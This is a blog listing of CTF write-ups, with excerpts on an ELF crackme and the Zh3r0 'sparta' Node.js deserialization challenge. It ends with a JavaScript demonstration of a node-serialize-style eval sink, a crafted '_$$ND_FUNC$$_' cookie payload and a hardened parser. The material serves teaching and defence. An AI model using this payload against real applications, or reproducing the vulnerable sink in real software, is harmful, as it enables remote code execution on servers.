Posts

Showing posts with the label CTF Write-up

Easy-ELF! Reversing.kr Walkthrough

Let's begin with the main function. First, the string "Reversing.Kr Easy ELF\n\n", defined in the .data section, is printed to stdout. Next there are two function calls, sub_8048434 and sub_8048451, and finally the return value of sub_8048451 is checked: if it is false, the string "Wrong\n" is printed to stdout. Let's start with sub_8048434. This function reads a string with scanf and stores it at the address starting at 0x804A020. As a test scenario, assume our input is "xxxxxxx". Moving on to sub_8048451, we have a series of checks; if all of them pass, the function returns true, otherwise false. Let's analyze each check individually. In the first case, the 2nd byte of the input is checked to verify whether it is "1", so we already know the correct key looks like "x1xxx..". Then, in the second case, it checks whether the 5th byte of the input ...

Sparta - 100 (EASY)

After participating in Zh3r0 CTF last year (2020), I thought the CTF had some really cool challenges, so I decided to look at a few of the challenges this year too. Let's jump straight into the technical write-up. In this post I describe my methodology for sparta - 100, an easy challenge in the web category. The challenge provided the source code along with a Dockerfile for hosting the web application locally. Looking at the source, it was clear that Express/Node.js was used at the back-end. Looking at the server code, one could see that there is a check for whether a "guest" token is passed in the cookie. If so, the value of the guest token is passed to unserialize() of the node-serialize module. That's it! We are talking about a Node.js deserialization vulnerability here. If the guest token is not part of the cookie, the application takes the username, country and city values from the request body and creates a base64-encoded JSON object. This is...
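To make the deserialization issue concrete, here is an added example that is not part of the challenge source or of the node-serialize module itself. The function unserializeLikeNodeSerialize() is a deliberately simplified stand-in written here for the string-to-function behaviour of node-serialize's unserialize(): after JSON.parse, any string value beginning with the `_$$ND_FUNC$$_` marker is passed to eval(), so a payload that ends in `()` runs as soon as the cookie is parsed. Beside it sits a hardened parser that uses plain JSON.parse with an allow-list of string fields. The field names username, country and city come from the write-up; the assumption that the cookie is base64-encoded JSON and the marker variable used to prove execution are constructed for this example.

```javascript
// Added example, not the challenge's own code. The cookie format (base64 JSON),
// the helper names and the globalThis marker are assumptions for demonstration.

const FUNCFLAG = "_$$ND_FUNC$$_";

// Simplified stand-in for node-serialize's unserialize(): parse the JSON, then
// eval() every string that starts with FUNCFLAG. Appending "()" to the
// serialized function turns it into an IIFE that executes during parsing.
function unserializeLikeNodeSerialize(payload) {
  const obj = typeof payload === "string" ? JSON.parse(payload) : payload;
  for (const key of Object.keys(obj)) {
    const value = obj[key];
    if (value !== null && typeof value === "object") {
      obj[key] = unserializeLikeNodeSerialize(value);
    } else if (typeof value === "string" && value.startsWith(FUNCFLAG)) {
      // This eval() is the sink: attacker-controlled source code is executed.
      obj[key] = eval("(" + value.slice(FUNCFLAG.length) + ")");
    }
  }
  return obj;
}

// Vulnerable handler pattern from the write-up: trust the guest cookie and
// hand the decoded value straight to unserialize().
function readGuestVulnerable(cookieValue) {
  const json = Buffer.from(cookieValue, "base64").toString("utf8");
  return unserializeLikeNodeSerialize(json);
}

// Hardened variant: JSON.parse can only ever yield data, never functions, and
// every field is checked against an allow-list of names and types.
function readGuestSafe(cookieValue) {
  let data;
  try {
    data = JSON.parse(Buffer.from(cookieValue, "base64").toString("utf8"));
  } catch {
    return null; // malformed base64 or JSON: reject the cookie
  }
  if (data === null || typeof data !== "object" || Array.isArray(data)) return null;
  const allowed = ["username", "country", "city"];
  const out = {};
  for (const k of allowed) {
    if (typeof data[k] !== "string" || data[k].length > 256) return null;
    out[k] = data[k]; // copied as an inert string, FUNCFLAG prefix or not
  }
  return out;
}

// Constructed malicious cookie: "username" carries a serialized function
// followed by "()". Here it only sets a marker so the effect is observable;
// a real payload would spawn a process with child_process.
globalThis.__sparta_marker = "untouched";
const maliciousPayload = JSON.stringify({
  username: FUNCFLAG + "function(){ globalThis.__sparta_marker = 'executed'; return 'guest'; }()",
  country: "IN",
  city: "Mumbai",
});
const maliciousCookie = Buffer.from(maliciousPayload).toString("base64");

// Runs the same cookie through both parsers and reports whether the payload fired.
function demonstrate() {
  globalThis.__sparta_marker = "untouched";
  const vulnResult = readGuestVulnerable(maliciousCookie);
  const vulnMarker = globalThis.__sparta_marker;
  globalThis.__sparta_marker = "untouched";
  const safeResult = readGuestSafe(maliciousCookie);
  const safeMarker = globalThis.__sparta_marker;
  return { vulnResult, vulnMarker, safeResult, safeMarker };
}

console.log(demonstrate());
```

The point of the comparison is that the unserialize() call is the sink regardless of how the cookie was encoded: base64 only hides the payload from a casual look, it does not authenticate it. A server that needs tamper-proof guest state should either sign the cookie (for example with a keyed HMAC verified before parsing) or keep the state server-side and hand out an opaque identifier.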